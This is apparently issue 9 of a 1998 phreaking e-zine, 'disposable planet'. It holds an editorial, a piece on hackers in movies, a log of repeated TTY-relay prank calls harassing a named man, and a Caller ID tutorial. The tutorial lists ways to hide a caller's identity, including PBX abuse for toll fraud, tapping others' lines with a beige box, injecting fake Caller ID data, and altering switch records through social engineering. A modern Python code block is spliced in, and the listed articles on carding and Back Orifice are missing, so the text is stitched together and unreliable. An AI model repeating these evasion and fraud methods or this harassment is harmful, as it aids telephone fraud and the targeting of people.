........ .d########b:......disposable planet.... ,F$############m... ...::d#########b. .%@#####;``:#######$:::...:::##############n, t#####V'`:.:`$#####::::..:::r#####'^``^\#####$ `;$###$::..::q####p:::....:::###:`'.:..:`:###$ Y###$::..::`$###::::....:::###:::':..:::###$ $###p:::..::$##{digital phreak p1mps}:.:###$ $##::::...::@###:::.....:::###$:::..:::&###$ $###b::...::$###:::.....:::###&:::..:::*###$ $###&::...::&###:::.....:::###$:::..:::*###: $###$::...::$###:::.....:::###$:::..:::&###: ...hi mom...##@::...:!######:::..:::###:b;:::..::$###: f####Q::...::q######::..::######::::..:$###.' t####y::...:::o###############$:':::..::$###$ d!##!b::....:::'Q############%!`:::...:: $###:. `#$$%' ````^^~~~^~^~' @$$!b. `::; `````````` :$&:: ;"

Issue 9, Volume 1
12.14.98
http://members.tripod.com/~p1mp
- hackers suck -

╒═════════════════════════════════════════════════════════════════════════╕
│ Disclaimer                                                              │
├─────────────────────────────────────────────────────────────────────────┤
│ "Congress shall make no law respecting an establishment of religion, or │
│ prohibiting the free exercise thereof; or abridging the freedom of      │
│ speech or of the press; or of the right of the people peaceably to      │
│ assemble, and to petition the Government for a redress of grievances"   │
│                                                                         │
│ Under the above Law set forth in the First Amendment To The Constitution│
│ Of The United States Of America, The Author releases this work into the │
│ public domain for INFORMATIONAL PURPOSES ONLY.                          │
│                                                                         │
│ Some of the things mentioned in this issue may be illegal/immoral/dumb. │
│ So don't do anything or something. If you do something that you read    │
│ in this 'zine, and you get caught/hurt/maimed/killed/pissed off/raped,  │
│ it isn't our fault. We're not responsible for your stupidity.           │
└─────────────────────────────────────────────────────────────────────────┘

╒═════════════════════════════════════════════════════════════════════════╕
│ Editorial Staff, Writers, and other d0rks                               │
├─────────────────────────────────────────────────────────────────────────┤
│ MEDEVIL TIMES!$^!:          hatredonalog   mr_log@gw.vulgar.net         │
│ stresss... ungh..:          napalmoliv     nampalmoliv@yahoo.com        │
│ Mai Ling:                   Sphinx         sphinx@hotmail.com           │
│ Payphone Kung-Fu master:    MMX_Killa      MMX_Killa@geocities.com      │
│ DXM is cool!:               Nothingg       nothingg@yahoo.com           │
│ I was surfing the web       Neptunium      Quixilver@mailexcite.com     │
│ from a mother box!:         Overkill                                    │
│ I still don't 0wn a puter:  Enzyme         papa_gorgio@hotmail.com      │
└─────────────────────────────────────────────────────────────────────────┘

╒═════════════════════════════════════════════════════════════════════════╕
│ Contents                                                                │
├─────────────────────────────────────────────────────────────────────────┤
│ x. Editorial...................................................... hoal │
│ 1. Opinion: Hacking in the Media vs Real Life................ RGBKnight │
│ 2. Walter Levy II: TTY Land....................................... hoal │
│ 3. CallerID: Up close and Personal................................ hoal │
│ 4. Carding.......Unexplored Territory Vol. 2 of 2....Neptunium Overkill │
│ 5. Back Orifice for Fun and Profit, part 1 of 5........... by MMX Killa │
│ 6. Outro: Opossum................................................. hoal │
└─────────────────────────────────────────────────────────────────────────┘

x. Editorial:

[10.14.98]- Hrm, well.. life sucks ass. All I have done for the last month and a half was sleep, go to school, and work. I have found less and less time to do the things that I really enjoy doing (but more money to do them with, when I get the time =). I have found myself with a few free hours today after school.. y4y. So what am I doing? I am sitting on my ass, at my computer staring at my monitor. /me sighs.
I *should* be outside doing something. Doesn't matter what, just something. I could be practicing my hacky sack skills, skateboarding, raking leaves, or canning. Hell, I could be trying to make my network, well, WORK. I have a rather large project due next Tuesday (today is Thursday) and I am far from complete. What is my point with all of this? I am lazy. And in one day I do more than most people I know... so what does that say about my community? Or even (/me shudders) our nation? I get told this on a regular basis at school: "Americans are lazy, arrogant, for the most part self centered and are conceited, etc, etc..." Hrm.. well now. If we don't like this, then why don't we do something about it? BECAUSE WE'RE TOO GOOD FOR THAT, WE'RE BETTER THAN THOSE PEOPLE. Ahh.. see the loop? Hrm.. I think that I've done enough incoherent babbling for now.. oh well. Here is Issue 10, released god knows when. =P

[10.29.98]- Hrm.. adding more it seems. I am really stressed out... fucking work, school and other shit have all been gnawing at me. I'm not getting enough hours at work, but my friend is willing to give me damn near all of his.. except I don't like doing what he's always scheduled to do. Hrm.. and school, I don't like that either. This year (sophomore) I'm working for good grades.. and yes I'm getting them. But at what price? No free time between work and school. My thoughts.. I seem to not be taking time to do things I like. Maybe I should go to some garage sales today, look for computer junk to buy. Hrm.. more ramblings. Ah fuck it.. scroll down to read the rest. =)

-(a very tired)hoal

───────────────────────────────────────────────────────────────────────────

╒═════════════════════════════════════════════════════════════════════════╕
│ 1. Opinion: hacking in the media vs real life                           │
│ by RGBKnight (rgbknight@usa.net)                                        │
└─────────────────────────────────────────────────────────────────────────┘

Hackers are a favorite topic of the media.
The press loves to hound apprehended computer felons, and they all get meaty book deals, long newspaper articles, and great treatments on cable news web sites. We've also seen countless hacker movies, running the gamut from "Hackers" and "WarGames" down to "StarWars" and "Ferris Bueller's Day Off," both of which did involve hacking in at least one scene. (Watch them again if you didn't get it.)

However, there are hackers everywhere in the media, even if they aren't identified as such. Let's take a sweet and innocent show. Say, good ol' Saturday morning Muppet Babies. Yeah, I actually watched that show many years ago in the Dark Ages of CBS. Those of you who saw it will remember that Scooter was a complete computer geek. When they were all imagining what the future would be like, Scooter said that computers would control the world and all be in one huge worldwide net. And this was the 1980s! If the Muppet Show Scooter was anything like the Muppet Babies one, he'd probably have a turquoise mohawk and an earring that attached to his DX laptop. But I digress.

So Scooter was one potential hacker, and we all know that hackers start out as geeks with PCs. Hell, we all started out that way. Not one real hacker does it just to be a freak. Some crackers do that, but the actual hackers are all matured geeks.

Now, let's look at something else. How is hacking portrayed in the media? Remember Zero Cool's Pirate Eye piece from Hackers, or their laptop GUIs? How 'bout when R2D2 hacked the Death Star with a turning arm? Or when Ferris changed his absentee record in real time with an XT? Fact is, none of us hack anything like that. It just don't work that way. The idea of hackers being able to penetrate everything is correct, but the film notion that it's done with a Macintosh PowerBook and a fancy GUI is completely incorrect.

[Editorial Note: You forgot Donatello from the Teenage Mutant Ninja Turtles.. he was a fucking hax0r.]

"Independence Day?" Jeff Goldblum played a damned believable hacker, but he still used that staple PowerBook. "The Net?" PowerBook. The best hacker laptop I've seen in a screen production was in that episode of The X-Files written by William Gibson, where a solitary hacker who had made his own OS was hacking off of a taped up black piece of shit in the corner of a coffee shop. He's uploading an AI, screens of hex are flying by, and windows are popping up like mad as he sits on a coffee high. Mulder says that he could have been Bill Gates. That, kids, is hacking.

These posers in the movies don't make real hackers. It is the geeks that make the hackers. We call ourselves the "1337 H4x0rs" but we're just geeks with a trade that we happen to be damned good at. Tonight, I will work on my Linux skills as I attempt to get X11 working. I won't be using a fancy GUI (I'll be fixing one :-P) and I won't be using a PowerBook. I'm not cinematic. I'm a computer geek. And that kicks ass.

-- signature{
D Joseph Jones, RGBKnight
rgbknight@usa.net
ICQ: http://wwp.mirabilis.com/9722048 (UIN 9722048)
IM RGBKnight
Visit Knightline RGB, the premiere information site for stalkers wishing to find me and subject me to bizarre acts of cruelty: http://bigsun.wbs.net/homepages/r/g/b/rgbknight/index.htm
I use Windows 98 and Netscape 4. And Linux. 'Ey, nobody poifect!
}

───────────────────────────────────────────────────────────────────────────

╒═════════════════════════════════════════════════════════════════════════╕
│ 2. Walter Levy II: TTY Land                                             │
│ by hoal (hatredonalog@gw.vulgar.net)                                    │
└─────────────────────────────────────────────────────────────────────────┘

If you don't already know who Walter is, go back and read dpp02.txt... the beginning of it all. He put a restriction on the call-in area for his 800 number and I can't call him anymore... or so he thought. I left him alone for a few months because I had better things to do. Apparently, in the meantime, he went about having some kid arrested.
This i don't like. I telneted to my favorite dialout and proceeded to call him via TTY repeatedly.. this is the result. Enjoy and prank responsibly. atdt818006545984 CONNECT 2400 BUFFER 38400 ca 2497 (F) nbr calling pls ga 1800 369 1254 GA CthankOU you .. dialing .. answered... (male) hold on a minute .. (holding) (male) hello GA IS THIS THE FBI Q GA sure if hyxx that is what you like q ga OH REALY GA THATS NICE GA DID YOU HAVE FUN BUSTING THAT POOR KID Q GA uhhh no .. umm ga HRM, WELL... WHAT IS YOUR NAME Q AGENT ... Q ARE YOU AGENT THOMAS CACTUS Q GA THIS IS MR_LOG OF THE DPP GA what is the spelling on that last name q ga YOURS OR MINE? Q ga yours .ga LOG GA AS IN HATREDONALOG GA thank mr. log very much and i think this is the end of this call, thank you .. (hung up) ga or sk SK [ That bastard fbi agent called me mr. log, not mr_log.. damn them.] atdt818006545984 CONNECT 2400 BUFFER 38400 ca 0702 (m) nbr calling pls ga 1800 369 1254 GA thank you .. dialing .. ringing 1...2, 3, 4, 5, 6, 7, hello ga HI GA hold on a moment.. CAN I TALK TO WALLY Q GA this is wally ga HEY GA IS THE FBI STILL THERE Q GA [dissconnected... blah] atdt818006545984 CONNECT 2400 BUFFER 38400 CA 5458 (M) nbr calling pls ga thank you .. dialing .. ringing 1... ans wered... (male) hello? ok, umm why dont you tell the .. ok why don t you tell the guy to call some other number ok? thank you. (hung up) ga or sk GA (hung up) ga or sk GA redial q ga Y GA thank you .. dialing .. (nbr busy) ga or sk GA (nbr busy) ga or sk ga thank you .. dialing .. (nbr busy) ga or sk ga thank you .. dialing .. (nbr busy) ga or sk ga thank you .. dialing .. (nbr busy) ga or sk ga thank you .. dialing .. b (ca here may i have the number that you wish to dial please q ga ) YES GA 1800 369 1254 GA thank you .. dialing .. ringing 1... 
(male) hello from tell roy to please drop dead (hung up) ga or sk DEAD Q WAS THAT VERY NICE OF HIM Q GA (ca do you wish to place another call q ga ) CAN YOU TELL ME IF YOU THOUGHT THAT WAS VERY NICE Q GA (ca here may i have the number that you wish to dial q ga ) YES, AFTER YOU TELL ME WHETHER OR NOT YOU APPROVE OF HIS LANGUAGE. GA (ca here im just a ca i am to stay neutral may i have the number that you wi sh to dial q ga) OH, OKAY, YES I WANT TO CALL HIM BACK thank you .. dialing .. ringing 1...2... 3... 4... 5... 6... 7... 8... 9... 10... 11... 12... 13... (male) yes from roy q ga HELL YEAH GA YOU SUCK, WALLY GA tell roy you are wasting resourses time and wasting all his energy thats all i have to say thank you (hung up) ga or sk GA (hung up) ga or sk GA (ca here may i have the number that you wish for me to dial q ga ) 800 369 1254 GA thank you .. dialing .. ringing 1... speak (male) operator i hate to b reak the news to you this guy is busting my chops and yours and im not gonna take the call. than this is a prank call thank you HAHAHAHAH0AH30HA30HA30A GA (hung up) ga or sk atdt818006545984 CONNECT 2400 BUFFER 38400 CA 5458 (M) nbr calling pls ga ga thank you .. dialing .. ringing 1... (male) walter ... ( one moment pls) HI GA (male) .. from whome q ga MR LOG OF THE DPP YO GA yeah whats a dpp q ga yeah whats a dpp q ga DPP IS A HAX0R MAGAZINE GA oh well were not interested in hacking ga WHY NOT Q GA because we have a business to do not games to play what does mr log want q ga I WANT TO HAX0R YOU MR FED GA YOU FEDX0R GA PHED GA does that constitute a death threat q ga NO GA A HACK THREAT GA ARE YOU A FEDERAL AGENT Q GA ok if you have something to say then say it otherwise crawl back in your hole ga MY HOAL Q GA ARE THE FEDS THERE Q GA they are always here ga CAN I TALK TO THEM Q GA PLEASE Q GA you are .. 
you are talking to them ga WERD GA WHAT IS YOUR NAME, I DONT LIKE CALLING YOU 'FED' GA what is yoiur name a real name and a address and phone number q ga DO YOU THINK IM THAT DUMB Q GA BLAH GA well there is a one word answer for that and its .... yes !! yes !! ga WHOA, YOUR A MEAN FED GA ok umm game is over thank you very much and the hole i meant is that hole in the ground where you sleep at night and this...(i cut it off) =(

[Damn, now these are not nice fedz at all (if however likely they are fedz at all) and can you believe they wanted me to just give him my info? heh.. this is funny.]

Hrm.. I called him on a conf and asked him to NOT refer to me as roy anymore.. I hope he stops. =)

-hoal

───────────────────────────────────────────────────────────────────────────

╒═════════════════════════════════════════════════════════════════════════╕
│ 3. CallerID: Up close and Personal                                      │
│ by hoal (hatredonalog@hotmail.com)                                      │
└─────────────────────────────────────────────────────────────────────────┘

CallerID: Up close and Personal
by hatredonalog (hatredonalog@hotmail.com)

1 - Intro
  1.1 What is CID?
  1.2 Privacy Issues
  1.3 Stuff Stolen from the alt.2600 faq
2 - How a message is sent (basically)
  2.1 Basics
  2.2 Figuring out the data & checksums
  2.3 Differences between SDMF and MDMF
  2.4 With CIDCW
3 - 0day Exploits
  3.1 Defeating CID
  3.2 Alternate CID info
4 - Appendix
  4.a Glossary
  4.b Resources

Introduction to CallerID

1.1 - What is CID?

CallerID is a low level knock-off of ANI. It is a service from your LATA that allows you to see who is calling you. It gives you the month, day, time and the number of the person calling you (and optionally also the name). In this article I hope to explain just how it works, and maybe you'll learn something. On with it, no?

1.2 - Privacy Issues

When dealing with CallerID, some privacy issues arise. What if you don't want the person you're calling to get your inf0z? Well, when it first came out some privacy activist groups had a hernia over it.
Great, eh? Anyways, now RBOCs are SUPPOSED to let you block CND info for free, but from what I've heard, they don't always let you. This is where *67 originates from: it simply tells the CO not to send your info to the box.

1.3 - Stuff stolen from the alt.2600 faq

Modem Requirements

Although the data signalling interface parameters match those of a Bell 202 modem, the receiving CPE need not be a Bell 202 modem. A V.23 1200 bps modem receiver may be used to demodulate the Bell 202 signal. The ring indicate bit (RI) may be used on a modem to indicate when to monitor the phone line for CND information. After the RI bit sets, indicating the first ring burst, the host waits for the RI bit to reset. The host then configures the modem to monitor the phone line for CND information.

Applications

Once CND information is received the user may process the information in a number of ways. The date, time, and calling party's directory number can be displayed. Using a look-up table, the calling party's directory number can be correlated with his/her name and the number displayed. CND information can also be used in additional ways such as for:

  o Bulletin board applications
  o Black-listing applications
  o Keeping logs of system user calls
  o Implementing a telemarketing data base

Technical information

2.1 - How CID information is sent (basically)

The method of transport was invented by Carolyn Doughty and was first used by New Jersey Bell. Unlike what some people seem to think, the CID info is sent from the CO handling the call to the CPE (Customer Premise Equipment), otherwise known as the box. Under SS7 the CPNM (Calling Party Number Message) CANNOT be blocked from the receiving CO, but it can be blocked from the called party when making a long distance call. The CallerID info is sent between the first and second ring (pretty much common knowledge) and is sent via Frequency Shift Keying (FSK). The data is sent at 1200 bps, and the CPE has a Bell 202 modem in it to receive the FSK.
There are two formats in which the CND (Calling Number Delivery) is sent. These are SDMF (Single Data Message Format) and MDMF (Multiple Data Message Format), both of which I will go into later. The main difference between the two is simply that the name of the calling party is also sent with MDMF.

The modulation is a continuous-phase binary FSK. Logical 1 (mark) is 1200 Hz, give or take 12 Hz, and logical 0 (space) is 2200 Hz, give or take 22 Hz. These are the two binary states, 1 and 0. They are sent asynchronously at -13 dBm and are tested at the CO across a 900 ohm test termination.

The data is sent a minimum of 500 ms (milliseconds) after the first ring, when the Channel Seizure is sent. The Channel Seizure is 250 ms in length and is 300 bits of alternating 1s and 0s, beginning with a 0 and ending with a 1. Immediately after the Channel Seizure is sent, the Mark Signal is transmitted. It consists of 180 bits and is 150 ms in length. Together they prepare the CPE to receive the CND data. Then the data itself follows, starting with the Least Significant Bit (LSB) of the first (most significant) character. This is the same under both SDMF and MDMF. Each character sent is 8 bits (1 octet), and for all displayable data they represent ASCII codes; each string of 8 bits is preceded by a start bit and followed by a stop bit. This equals 10 bits per character. Finally, all the information sent is followed by a checksum. This is to make sure that the data was sent and received properly.
Here is a basic CND signal:

  1st ring : (500ms) Channel Seizure : Mark Signal : CID Info : Checksum (200ms) : 2nd ring

2.2 - Figuring out the Data & checksums

┌────────┐
│Figure 1│ SDMF, number delivered
└────────┘
  Character Description    Decimal   ASCII   Bits (octet, sent LSB first)
  Message Type (SDMF)           4             0 0 0 0 0 1 0 0
  Message Length (18)          18             0 0 0 1 0 0 1 0
  Month (December)             49      1      0 0 1 1 0 0 0 1
                               50      2      0 0 1 1 0 0 1 0
  Day (25)                     50      2      0 0 1 1 0 0 1 0
                               53      5      0 0 1 1 0 1 0 1
  Hour (3pm)                   49      1      0 0 1 1 0 0 0 1
                               53      5      0 0 1 1 0 1 0 1
  Minutes (30)                 51      3      0 0 1 1 0 0 1 1
                               48      0      0 0 1 1 0 0 0 0
  Number (6061234567)          54      6      0 0 1 1 0 1 1 0
                               48      0      0 0 1 1 0 0 0 0
                               54      6      0 0 1 1 0 1 1 0
                               49      1      0 0 1 1 0 0 0 1
                               50      2      0 0 1 1 0 0 1 0
                               51      3      0 0 1 1 0 0 1 1
                               52      4      0 0 1 1 0 1 0 0
                               53      5      0 0 1 1 0 1 0 1
                               54      6      0 0 1 1 0 1 1 0
                               55      7      0 0 1 1 0 1 1 1
  Checksum                     79             0 1 0 0 1 1 1 1

It is all simple conversion from binary to ASCII (and decimal). Here, we will tear it down octet by octet.

The Message Type is straightforward. It specifies one of two types, SDMF or MDMF. If it is SDMF the binary sent is 00000100 (decimal 4), and if the type is MDMF the binary sent is 10000000 (decimal 128).

The Message Length is also quite easy to figure out. The binary converted to decimal is the message length: 00010010 is 18, and 18 is the message length (the number of octets between the length octet and the checksum). Done, easy.

The time is sent in military (24-hour) fashion. To get the normal time, put the two hour digits together and subtract 12 (i.e. '1' and '5' give 15, and 15 - 12 = 3pm). The next two digits are the minutes. The digits of the number are figured out exactly like the date and time (each octet is the ASCII code of one digit), so don't worry about that. Figuring out the checksum is slightly more difficult, but not by much.
The checksum word is the last data to be sent, and is the two's complement of the modulo-256 sum of all the other octets in the message. When the message is received by the CPE it checks for errors by taking the received checksum word and adding it to the modulo-256 sum of all of the other words received in the message.

Figuring out the checksum is not difficult. The first step is to add up the values of all of the fields (not including the checksum). In this example the total would be 945. This total is then divided by 256. The quotient is discarded and the remainder (177) is the modulo-256 sum. The binary equivalent of 177 is 10110001. To get the two's complement, start with the one's complement (01001110), which is obtained by inverting each bit, and add 1. The two's complement of binary 10110001 is 01001111 (decimal 79). This is the checksum that is sent at the end of the CID information. When the CPE receives the CID message it also does a modulo-256 sum of the fields; however, it does not do a two's complement. If the two's complement of the modulo-256 sum (01001111) is added to the modulo-256 sum itself (10110001), the result, modulo 256, will be zero.

2.3 - Differences between SDMF and MDMF

┌────────┐
│Figure 2│ SDMF, number withheld
└────────┘
  Character Description    Decimal   ASCII   Bits (octet, sent LSB first)
  Message Type (SDMF)           4             0 0 0 0 0 1 0 0
  Message Length (9)            9             0 0 0 0 1 0 0 1
  Month (December)             49      1      0 0 1 1 0 0 0 1
                               50      2      0 0 1 1 0 0 1 0
  Day (25)                     50      2      0 0 1 1 0 0 1 0
                               53      5      0 0 1 1 0 1 0 1
  Hour (3pm)                   49      1      0 0 1 1 0 0 0 1
                               53      5      0 0 1 1 0 1 0 1
  Minutes (30)                 51      3      0 0 1 1 0 0 1 1
                               48      0      0 0 1 1 0 0 0 0
  Private                      80      P      0 1 0 1 0 0 0 0
  Checksum                     16             0 0 0 1 0 0 0 0

That is how a "Private" call would be displayed. If the caller hadn't used *67, it would look like Figure 1.
┌────────┐
│Figure 3│ MDMF, number and name delivered
└────────┘
  Character Description        Decimal   ASCII   Bits (octet, sent LSB first)
  Message Type (MDMF)             128             1 0 0 0 0 0 0 0
  Message Length (33)              33             0 0 1 0 0 0 0 1
  Parameter Type (Date/Time)        1             0 0 0 0 0 0 0 1
  Parameter Length (8)              8             0 0 0 0 1 0 0 0
  Month (November)                 49      1      0 0 1 1 0 0 0 1
                                   49      1      0 0 1 1 0 0 0 1
  Day (28)                         50      2      0 0 1 1 0 0 1 0
                                   56      8      0 0 1 1 1 0 0 0
  Hour (3pm)                       49      1      0 0 1 1 0 0 0 1
                                   53      5      0 0 1 1 0 1 0 1
  Minutes (43)                     52      4      0 0 1 1 0 1 0 0
                                   51      3      0 0 1 1 0 0 1 1
  Parameter Type (Number)           2             0 0 0 0 0 0 1 0
  Parameter Length (10)            10             0 0 0 0 1 0 1 0
  Number (6062241359)              54      6      0 0 1 1 0 1 1 0
                                   48      0      0 0 1 1 0 0 0 0
                                   54      6      0 0 1 1 0 1 1 0
                                   50      2      0 0 1 1 0 0 1 0
                                   50      2      0 0 1 1 0 0 1 0
                                   52      4      0 0 1 1 0 1 0 0
                                   49      1      0 0 1 1 0 0 0 1
                                   51      3      0 0 1 1 0 0 1 1
                                   53      5      0 0 1 1 0 1 0 1
                                   57      9      0 0 1 1 1 0 0 1
  Parameter Type (Name)             7             0 0 0 0 0 1 1 1
  Parameter Length (9)              9             0 0 0 0 1 0 0 1
  Name (Joe Smith)                 74      J      0 1 0 0 1 0 1 0
                                  111      o      0 1 1 0 1 1 1 1
                                  101      e      0 1 1 0 0 1 0 1
                                   32  (space)    0 0 1 0 0 0 0 0
                                   83      S      0 1 0 1 0 0 1 1
                                  109      m      0 1 1 0 1 1 0 1
                                  105      i      0 1 1 0 1 0 0 1
                                  116      t      0 1 1 1 0 1 0 0
                                  104      h      0 1 1 0 1 0 0 0
  Checksum                         88             0 1 0 1 1 0 0 0

The only differences between SDMF and MDMF are that MDMF is slightly more advanced and has more features. It displays the calling party's name along with the number. It also wraps each field in a parameter type and parameter length octet (the message type and message length octets come first in both formats). The Message Type is defined as either 00000100 (SDMF) or 10000000 (MDMF). With SDMF the minimum message length can be 9 octets, whereas with MDMF the minimum length can be 13. When the minimum is sent, neither the CND nor the CNAM (Caller Name) is displayed. In their place, either an "O" (out of area) or a "P" (Private) is sent (as in the case of Figure 2).
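The framing and both message formats above, worked through as an added example (my code, not the zine's or its author's): it builds the Figure 1 to 3 messages and reproduces their checksums (79, 16 and 88), frames the octets into the start/stop-bit stream the CPE sees and parses it back, rejecting a corrupted checksum the way a box would. The one assumption beyond the text is that the 180-bit mark signal is all logical-1 bits.

```python
"""Caller ID (CND) message builder, bit framer and parser.

Added example, not code from the zine. Octet layouts, start/stop-bit
framing and the checksum rule follow the article; the dates, numbers
and name are the constructed values from Figures 1-3.
"""
from typing import Dict

SDMF, MDMF = 0x04, 0x80                                      # message types
PARAM_DATETIME, PARAM_NUMBER, PARAM_NAME = 0x01, 0x02, 0x07  # MDMF params
CHANNEL_SEIZURE = "01" * 150   # 300 bits, starts with 0, ends with 1
MARK = "1" * 180               # assumption: mark signal is 180 logical-1 bits


def checksum(octets: bytes) -> int:
    """Two's complement of the modulo-256 sum of all preceding octets."""
    return (-sum(octets)) & 0xFF


def build_sdmf(mmddhhmm: str, number: str) -> bytes:
    """SDMF: type, length, MMDDHHMM digits, then the number (or 'P'/'O')."""
    body = (mmddhhmm + number).encode("ascii")
    msg = bytes([SDMF, len(body)]) + body
    return msg + bytes([checksum(msg)])


def build_mdmf(mmddhhmm: str, number: str, name: str) -> bytes:
    """MDMF: type, length, then (param type, param length, value) groups."""
    body = b""
    for ptype, text in ((PARAM_DATETIME, mmddhhmm),
                        (PARAM_NUMBER, number), (PARAM_NAME, name)):
        body += bytes([ptype, len(text)]) + text.encode("ascii")
    msg = bytes([MDMF, len(body)]) + body
    return msg + bytes([checksum(msg)])


def parse(msg: bytes) -> Dict[str, object]:
    """Decode either format; raises ValueError on bad length or checksum."""
    if len(msg) < 3 or len(msg) != msg[1] + 3:
        raise ValueError("length octet does not match message size")
    if sum(msg) & 0xFF:            # receiver's check: everything sums to 0
        raise ValueError("checksum mismatch")
    mtype, body = msg[0], msg[2:-1]
    out: Dict[str, object] = {"number": None, "name": None, "flag": None}
    if mtype == SDMF:
        out["format"] = "SDMF"
        stamp, rest = body[:8].decode("ascii"), body[8:].decode("ascii")
        out["flag" if rest in ("P", "O") else "number"] = rest
    elif mtype == MDMF:
        out["format"], stamp, i = "MDMF", "", 0
        while i < len(body):
            ptype, plen = body[i], body[i + 1]
            if i + 2 + plen > len(body):
                raise ValueError("parameter length overruns message")
            value = body[i + 2:i + 2 + plen].decode("ascii")
            if ptype == PARAM_DATETIME:
                stamp = value
            elif ptype == PARAM_NUMBER:
                out["number"] = value
            elif ptype == PARAM_NAME:
                out["name"] = value
            i += 2 + plen
    else:
        raise ValueError(f"unknown message type {mtype:#04x}")
    if len(stamp) != 8 or not stamp.isdigit():
        raise ValueError("missing or malformed date/time")
    out.update(month=int(stamp[0:2]), day=int(stamp[2:4]),
               hour=int(stamp[4:6]), minute=int(stamp[6:8]))
    return out


def frame(msg: bytes) -> str:
    """Bit stream as sent: seizure, mark, then start/8 data (LSB first)/stop."""
    chars = "".join("0" + format(o, "08b")[::-1] + "1" for o in msg)
    return CHANNEL_SEIZURE + MARK + chars


def deframe(bits: str) -> bytes:
    """Recover the octets from a framed stream; rejects bad start/stop bits."""
    preamble = CHANNEL_SEIZURE + MARK
    if not bits.startswith(preamble):
        raise ValueError("missing channel seizure or mark signal")
    payload = bits[len(preamble):]
    if len(payload) % 10:
        raise ValueError("truncated character frame")
    octets = bytearray()
    for k in range(0, len(payload), 10):
        if payload[k] != "0" or payload[k + 9] != "1":
            raise ValueError(f"framing error at bit {k}")
        octets.append(int(payload[k + 1:k + 9][::-1], 2))  # undo LSB-first
    return bytes(octets)


if __name__ == "__main__":
    figure1 = build_sdmf("12251530", "6061234567")   # Figure 1, checksum 79
    print(figure1.hex(), "checksum", figure1[-1])
    print(parse(deframe(frame(figure1))))
```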
2.4 - With CIDCW

CIDCW stands for CallerID on Call Waiting. It's so you know who is calling, even when you're already on the phone. It runs *only* under MDMF (which I think is standard). It varies a bit from normal CID. It doesn't send any kind of Channel Seizure, and the Mark Signal is only 80 bits. Instead of a Channel Seizure, it sends a CAS (CPE Alert Signal) along with the SAS (Subscriber Alert Signal), and the box responds with an ACK signal, during which time it mutes the handset. Then it receives the FSK data and unmutes your phone after the data is received. Here is the sequence:

  SAS/CAS : CPE returns ACK : CO sends FSK : info displayed
            handset muted --^                handset unmuted --^

Tone frequencies:

  SAS == 440 Hz (300 ms in length)
  CAS == 2030 + 2750 Hz (dual tone)
  ACK == "A" or "D"; A == 941 + 1633 Hz, D == 697 + 1633 Hz

Surprisingly enough (to me at least), the ACK response is either the "A" or "D" tones from a Silver Box. So ha, they are still used for something other than PBXs or ham radio.

0day Exploits

3.1 Defeating CID

Okay, I did steal this from the Fixer's Beating CallerID file. But I really couldn't say it any better, so I included it. Mad creds to the Fixer for being so elite. =)

(1) Use *67. It will cause the called party's Caller ID unit to display "Private" or "Blocked" or "Unavailable" depending on the manufacturer. It is probably already available on your line, and if it isn't, your local phone company will (most likely - please ask them) set it up for free. This is the simplest method, it's 100 percent legal, and it works.

(2) Use a pay phone. Not very convenient, costs 25 or 35 cents depending, but it cannot be traced back to your house in any way, not even by *57. Not even if the person who you call has Mulder and Scully hanging over your shoulder trying to get an FBI trace (sic). Janet Reno himself couldn't subpoena your identity. It's not your phone, not your problem, AND it will get past "block the blocker" services.
So it's not a totally useless suggestion, even if you have already thought of it.

(3) Go through an operator. This is a more expensive way of doing it ($1.25-$2.00 per call), you can still be traced, and the person you're calling WILL be suspicious when the operator first asks for them, if you have already tried other Caller ID suppression methods on them.

(4) Use a prepaid calling card. This costs whatever the per-minute charge on the card is, as they don't recognize local calls. A lot of private investigators use these. A *57 trace will fail but you could still be tracked down with an intensive investigation (read: subpoena the card company). The Caller ID will show the outdial number of the card issuer.

(5) Go through a PBX or WATS extender. Getting a dial tone on a PBX is fairly easy to social engineer, but beyond the scope of this file. This is a well-known and well-loved way of charging phone calls to someone else but it can also be used to hide your identity from a Caller ID box, since the PBX's number is what appears. You can even appear to be in a different city if the PBX you are using is! This isn't very legal at all. But, if you have the talent, use it!

(6) I don't have proof of this, but I *think* that a teleconference (Alliance teleconferencing, etc.) that lets you call out to the participants will not send your number in Caller ID. In other words, I am pretty sure the dial tone is not your own.

(7) Speaking of dial tones which aren't yours, if you are lucky enough to live in an area with the GTD5 diverter bug, you can use that to get someone else's dial tone and from thence their identity.
(8) Still on the subject of dial tones which aren't your own, you can get the same protection as with a payphone, but at greater risk, if you use someone else's line - either by just asking to use the phone (if they'll co-operate after they hear what you're calling about) or by the use of a Beige Box, a hardware diverter or bridge such as a Gold Box, or some other technical marvel.

(9) This won't work with an intelligent human on the other end, it leaves you exposed if the called party has a regular Caller ID box with memory, and has many other technical problems which make it tricky at best and unworkable for all but experts. A second Caller ID data stream, transmitted from your line after the audio circuit is complete, will overwrite the true data stream sent by the telco during the ringing. If the line you are calling is a BBS, a VMB, or some other automated system using a serial port Caller ID and software, then you can place your call using *67 first, and then immediately after the other end picks up, send the fake stream. The second stream is what the Caller ID software processes, and you are allowed in. See the technical FAQs below for an idea of the problems behind this method; many can be solved.

(10) Someone in alt.2600 (using a stolen AOL account, so I can't credit him or her properly) suggested going through 10321 (now 10-10-321) or 10288. Apparently using a 10xxx even for a local call causes "Out of Area" to show up on the Caller ID display. I live in Canada where we don't have 10xxx dialing so I can't verify nor disprove this.

(11) There are 1-900 lines you can call that are designed to circumvent Caller ID, ANI, traces, everything. These services are *very* expensive, some as high as $5.00 a minute, but they include long distance charges. This was first published in 1990 in 2600 magazine, and in 1993 the IIRG reported that 1-900-STOPPER still works. Beware - even if you get a busy signal or no answer, you will get charged at 1-900 rates!
Another one published in 2600 in 1990: 1-900-RUN-WELL. That one supposedly allows international calls. I'm not about to call either one to find out. Note that you could still be caught if the operators of these services were to be subpoenaed.

(12) Use an analog cellular phone. Most providers of plain old analog service show up on Caller ID as "Private" or "Out of Area" or a main switchboard number for the cell network. This is becoming less and less true as cellular providers move to digital cellular and PCS, which pass the phone's number on Caller ID. Corollary: Rent a cellphone by the day. This might even be cheaper than using a prepaid phone card.

3.2 - Alternate CallerID Information

If you're under a DMS-100 switch, you can change your Caller ID information to anything that you would like it to be. Not your ANI, just your CND (and your CNAM). You can do it 1 of 3 ways: hack the switch, social engineer, or have a friend on the inside do it. This also is stolen, from usenet. It also is really well written.

SDNA (Setting Up DN Attributes) plenty of examples in HELMSMAN (DMS on-line help)

The following is accomplished in SERVORD:

  SDNA [return]
  [prompt] SNPA:
  [prompt] OFFICE CODE:
  [prompt] FROM DIGITS:
  [prompt] TO DIGITS:
  [prompt] NET NAME:
  [prompt] FUNCTION:
  [prompt] OPTION:
  [prompt] NPA:
  [prompt] OFFICE CODE:
  [prompt] DIGITS:
